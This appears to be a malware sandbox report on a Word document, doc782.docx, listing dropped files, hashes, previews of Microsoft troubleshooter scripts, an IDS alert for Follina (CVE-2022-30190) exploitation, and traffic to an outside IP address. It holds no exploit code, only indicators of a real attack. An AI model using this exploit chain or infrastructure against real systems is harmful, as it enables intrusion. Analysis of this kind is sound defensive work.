                                                                                                                                                                                            SSDEEP:24:Hm3W9oVKpkHJhKe3feI+ycuZhN9akSLPNnq9Yld:A/VCk3Ke3m1ul9a3hq9YP
                                                                                                                                                                                            MD5:7810C97B7394B23F7585151B24284EC7
                                                                                                                                                                                            SHA1:2C1AD090AB3DFA44BEB3CF426427611242647D40
                                                                                                                                                                                            SHA-256:C98816400EDFA15F7D3EE43309F7E63C986046942F3DFEB93E4C4D647A98CAAE
                                                                                                                                                                                            SHA-512:B3F4F06C3F00309A40DD15E82F21048319A84D7B1577F325DECE02482ACF139E4DAB8EC5993FCD57EBC270AAFEF31051C7F5DB32DB614A761AD3437F05C13E66
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.0895003920163724
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7YnqqZPN5Dlq5J:+RI+ycuZhNHakSZPNnqX
                                                                                                                                                                                            MD5:CC7F2677166FB391007D83F88C688CA1
                                                                                                                                                                                            SHA1:AF0717ACCDF6F325737DC93AE8FFC17B46E7977F
                                                                                                                                                                                            SHA-256:120DEF284865455EA87557F01AF1118C8DD9F6BC03E733FC281EF2A636D746F4
                                                                                                                                                                                            SHA-512:E350EC8168352FA19CC9A4EC4F13A2E1E4643EB85B2EA3CD5EC0B2F20CF71162F710815DC8152F3BA8406623C0ADA6FC0D7C3A792028030A0322FA867F9A0F9C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                                            Entropy (8bit):3.782786887295759
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:64oPhmKraYZkH8KTibUyPkwjj0JeC+CFSlwYNfc1ulHa3bq:ODaAkHHoxk8ZCuNnlK
                                                                                                                                                                                            MD5:766473A4C386B81551C7D3971EC5AC33
                                                                                                                                                                                            SHA1:3CD89F9EFCC926EFCAED14A32447CF4FA5CF71C0
                                                                                                                                                                                            SHA-256:BEA495B174127D5766239B72098729676749D125123E2E495687F098C0C51A7F
                                                                                                                                                                                            SHA-512:699BE66D691484E61B92F08BA27AB563BB48D257C1FC65F65CCA086B184EC0EAEB23878C6121EE63CA5CFAB7B4DDCA6687FAB3EE95CC101DF414643272240E53
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.11145665806792
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryd9ak7Ynqq2SPN5Dlq5J:+RI+ycuZhN9akSLPNnqX
                                                                                                                                                                                            MD5:E9549296A3E219BE4564CF14A090740B
                                                                                                                                                                                            SHA1:77CD8D88D1CDAB155492F98D34EDCC59AB7DB6F5
                                                                                                                                                                                            SHA-256:F79F6A4A3E7CC613B15D726492556057E4412FD788E3A3BF35297499DACCBBFD
                                                                                                                                                                                            SHA-512:E7BED82FB85D1520F3157836119F0A20F98522AA2680FF4DEA29CF32B0CF8BC5D5B62B3FA7A0C3A80BA5589097D81E83E77D5424B902C8C6EA0C4E9F667F58EE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                                            Entropy (8bit):3.088648770844524
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:etGSo89pz1qlkCe745Q7GslPor9jvX5ekjV4gztkZfhy6Iv+CqzOBWI+ycuZhN9B:6dpqb927GslPyDRjyJhok1ul9a3hq
                                                                                                                                                                                            MD5:3BC757DB7B82771A228AC8E6B156076A
                                                                                                                                                                                            SHA1:E8E6F16F1469AFFB683D65208D5DF1BE4D738473
                                                                                                                                                                                            SHA-256:ED86906E5744CF340300AD2CA8F96FE0D04EF4EB01770E9B9E0FDF17F90B3A73
                                                                                                                                                                                            SHA-512:BB091D5BFF577921887F0C8CEA33B50B2C00D38A773BC6DB1A7EE6460656C1E30A95E887001631AC623D30AFE0870DC61D0642DF2BBFDB719E413FD116E495E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:28:53 2022, mtime=Wed Jun 8 01:50:16 2022, atime=Wed Jun 8 01:50:04 2022, length=10144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1045
                                                                                                                                                                                            Entropy (8bit):4.711472390862526
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:8hAdC0A0UH6CHic4FpGXQDHs+WGG3A/bYbjAA/y/lHm2NDyUDk36k3o4t2Y+xIBx:8hk+JOkKHdqA0AAKJDyg7aB6m
                                                                                                                                                                                            MD5:25480BE39C79A08C7076EA996A394D31
                                                                                                                                                                                            SHA1:2D2D42155FA93FAF073DA0A3F1257ABC2575F3B6
                                                                                                                                                                                            SHA-256:2390F6D1EB3B92CAEBBF23BD87C2F87D6DF960DA6624AC32D271D75F93797D08
                                                                                                                                                                                            SHA-512:25B330A517002DEA83F6BF9004D97D8DAFD45B6FB366F124DDDD767DE1768BBDC0AF7A5A43323636D08D47C85ABC54EE65F77C37F96A222DC9ADC398950FCA2C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):4.601202445739505
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
                                                                                                                                                                                            MD5:538F5016C24249AC1799BBBB20B4BD97
                                                                                                                                                                                            SHA1:1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
                                                                                                                                                                                            SHA-256:249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
                                                                                                                                                                                            SHA-512:E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):3.039103887420846
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                                            MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                                            SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                                            SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                                            SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                                            Entropy (8bit):2.8954618442383215
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                                            MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                                            SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                                            SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                                            SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..p.r.a.t.e.s.h.....
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):3.039103887420846
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                                            MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                                            SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                                            SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                                            SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):24702
                                                                                                                                                                                            Entropy (8bit):4.37978533849437
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                                            MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                                            SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                                            SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                                            SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):66560
                                                                                                                                                                                            Entropy (8bit):6.926109943059805
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                                            MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                                            SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                                            SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                                            SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: 68101181_048154.img, Detection: malicious
                                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious
                                                                                                                                                                                            • Filename: doc1712.docx, Detection: malicious
                                                                                                                                                                                            • Filename: R346ltaP9w.rtf, Detection: malicious
                                                                                                                                                                                            • Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious
                                                                                                                                                                                            • Filename: WykHEO9BQN.rtf, Detection: malicious
                                                                                                                                                                                            • Filename: lol666 (2).bat, Detection: malicious
                                                                                                                                                                                            • Filename: EISPv0c56U.doc, Detection: malicious
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious
                                                                                                                                                                                            • Filename: 05-2022-0438.doc, Detection: malicious
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16946
                                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                                            File type:Microsoft OOXML
                                                                                                                                                                                            Entropy (8bit):7.869060797789825
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                                            • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                                            File name:doc782.docx
                                                                                                                                                                                            File size:10144
                                                                                                                                                                                            MD5:e7015438268464cedad98b1544d643ad
                                                                                                                                                                                            SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
                                                                                                                                                                                            SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
                                                                                                                                                                                            SHA512:d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
                                                                                                                                                                                            SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
                                                                                                                                                                                            TLSH:A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
                                                                                                                                                                                            Icon Hash:74fcd0d2d6d6d0cc
Timestamp:06/07/22-19:44:37.058628
Protocol:TCP
SID:2036726
Message:ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)
Source Port:80
Dest Port:49171
Source IP:185.234.247.119
Dest IP:192.168.2.22
Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480458021 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480494976 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480514050 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480530977 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480539083 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480545998 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480547905 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480560064 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480565071 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.480583906 CEST8049865185.234.247.119192.168.2.5
